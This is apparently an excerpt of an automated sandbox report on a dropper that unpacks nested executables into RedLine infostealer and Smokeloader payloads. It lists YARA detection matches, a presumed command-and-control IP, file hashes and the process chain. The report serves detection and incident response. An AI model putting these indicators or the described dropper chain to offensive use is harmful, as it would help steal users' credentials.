00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23

                    System Summary

                    barindex
                    Source: 5.2.kGO12fD60.exe.5130000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.4bb0000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.2206cde.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.2207bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.2206cde.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.640e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.4bb0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.3.kGO12fD60.exe.7b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.2207bc6.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.iOqzwbUlln.exe.47eac20.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.4bb0ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.4bb0ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.5130000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.iOqzwbUlln.exe.47eac20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.3.kGO12fD60.exe.8afeb0.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.3.kGO12fD60.exe.8afeb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.402237426.0000000000848000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E83BA20_2_00E83BA2
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E85C9E0_2_00E85C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C3BA21_2_000C3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C5C9E1_2_000C5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F3BA22_2_001F3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F5C9E2_2_001F5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE3BA23_2_00DE3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE5C9E3_2_00DE5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00408C605_2_00408C60
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0040DC115_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00407C3F5_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00418CCC5_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00406CA05_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004028B05_2_004028B0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0041A4BE5_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004182445_2_00418244
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004016505_2_00401650
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00402F205_2_00402F20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004193C45_2_004193C4
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004187885_2_00418788
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00402F895_2_00402F89
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00402B905_2_00402B90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004073A05_2_004073A0
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe 577AF1002754AEB104A8EADE2F2A011C6A0FC75F8F8E87AB51BFBBD892BE151D
                    Source: iOqzwbUlln.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5.2.kGO12fD60.exe.5130000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.4bb0000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.2206cde.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.2207bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.2206cde.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.640e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.4bb0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.3.kGO12fD60.exe.7b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.2207bc6.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.iOqzwbUlln.exe.47eac20.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.4bb0ee8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.4bb0ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.5130000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.iOqzwbUlln.exe.47eac20.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.3.kGO12fD60.exe.8afeb0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.3.kGO12fD60.exe.8afeb0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.402237426.0000000000848000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00E81F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_000C1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_001F1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00DE1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: String function: 0040E1D8 appears 44 times
                    Source: iOqzwbUlln.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 973536 bytes, 2 files, at 0x2c +A "szV94FU13.exe" +A "rWE40pD80.exe", ID 2077, number 1, 36 datablocks, 0x1503 compression
                    Source: szV94FU13.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 825492 bytes, 2 files, at 0x2c +A "stL82bL52.exe" +A "nAT03lr78.exe", ID 2117, number 1, 32 datablocks, 0x1503 compression
                    Source: stL82bL52.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 541618 bytes, 2 files, at 0x2c +A "sQm37qN82.exe" +A "mlf76Mf25.exe", ID 2154, number 1, 21 datablocks, 0x1503 compression
                    Source: sQm37qN82.exe.2.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 252264 bytes, 2 files, at 0x2c +A "iDa05Vg46.exe" +A "kGO12fD60.exe", ID 2030, number 1, 11 datablocks, 0x1503 compression
                    Source: iOqzwbUlln.exe, 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs iOqzwbUlln.exe
                    Source: iOqzwbUlln.exe, 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKhediviate.exe< vs iOqzwbUlln.exe
                    Source: iOqzwbUlln.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs iOqzwbUlln.exe
                    Source: iOqzwbUlln.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\iDa05Vg46.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/10@0/1
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E83FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00E83FEF
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeCode function: 4_2_00007FF815F01B10 ChangeServiceConfigA,4_2_00007FF815F01B10
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E84FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00E84FE0
                    Source: iOqzwbUlln.exeReversingLabs: Detection: 66%
                    Source: iOqzwbUlln.exeVirustotal: Detection: 57%
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\iOqzwbUlln.exe C:\Users\user\Desktop\iOqzwbUlln.exe
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00E81F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_000C1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_001F1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00DE1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E8597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00E8597D
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.00000000038CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
